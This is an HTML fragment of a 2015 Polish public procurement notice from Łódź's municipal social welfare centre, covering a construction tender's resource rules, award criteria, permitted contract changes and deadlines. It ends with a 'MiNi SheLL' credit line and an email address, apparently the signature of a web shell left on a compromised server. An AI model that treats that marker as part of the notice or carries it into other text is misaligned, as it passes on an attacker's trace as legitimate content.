Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art.26 ust. 2b, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału  w postępowaniu na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne  do wykonania zamówienia, zdolności finansowe lub ekonomiczne innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków, zobowiązany jest udowodnić Zamawiającymi, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych  podmiotów do oddania mu do  dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego powinien wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia Wykonawcy, ubiegającemu się o zamówienie odpowiedniego zasobu oraz wskazywać:
-jaki jest zakres dostępnych Wykonawcy zasobów innego podmiotu,
-w jaki sposób zostaną wykorzystane zasoby innego podmiotu, przez Wykonawcę, przy
wykonywaniu zamówienia,
-jakiego charakteru stosunki będą łączyły Wykonawcę z innym podmiotem,
-jaki jest zakres i w jakim okresie inny podmiot będzie brał udział przy wykonywaniu
zamówienia.
Jeżeli Wykonawca wykazuje spełnianie warunków o których mowa w art.22 ust. 1 polega
na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo
zamówień publicznych, a podmioty te będą brały udział w realizacji części zamówienia zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów oświadczeń o  braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust 1 ustawy Prawo zamówień publicznych (załącznik nr 3). 
Dokument określający zasady reprezentacji oraz osoby uprawnione do  reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres udzielonej gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakres istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy mogących stanowić podstawę do przedłużenia terminu wykonania robót budowlanych
-wystąpienie zamówień dodatkowych, spełniających przesłanki, o których mowa  w art. 67 ust. 1 pkt 5 ustawy Prawo zamówień publicznych,
-wystąpienie warunków, odmiennych od przyjętych w specyfikacji technicznej wykonania i odbioru robót budowlanych, - utrudniających terminowe lub prawidłowe wykonanie zamówienia,
-wystąpienie siły wyższej,
-wystąpienie zmian w przepisach prawa,
-działanie lub zaniechanie organów władzy publicznej lub instytucji, w tym zmiany urzędowych interpretacji przepisów dotyczących wykonywania lub finansowania robót budowlanych,
-przekroczenie określonych w przepisach prawa terminów wydawania decyzji, zezwoleń, itp., jeżeli nie wynika to z przyczyn leżących po stronie Wykonawcy,
-wydanie postanowienia lub decyzji o wstrzymaniu robót budowlanych, w przypadkach określonych w przepisach ustawy - Prawo budowlane,
-wydanie orzeczenia przez sąd lub inny podmiot, którego nie można było przewidzieć w chwili zawarcia umowy.
Za zgodą Stron umowy dopuszcza się również dokonanie następujących istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy poprzez zmiany sposobu wykonania robót budowlanych, w tym wprowadzenia robót zamiennych, wskutek
-warunków, odmiennych od przyjętych w specyfikacji technicznej wykonania
i odbioru robót budowlanych, 
-rezygnacji przez Zamawiającego z wykonania części robót budowlanych, wraz uwzględnieniem konsekwencji finansowych zmiany.
Zamawiający dopuszcza zmianę umowy w przypadku zmiany stawki VAT w zakresie kwoty VAT i kwoty wynagrodzenia brutto.
Zmiany, o których mowa  powyżej mogą stanowić podstawę do zmiany wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uml.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Łodzi 90-440 Łódź ul. Kilińskiego 102, 102a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2015 godzina 12:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Łodzi 90-440 Łódź ul. Kilińskiego 102, 102a
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com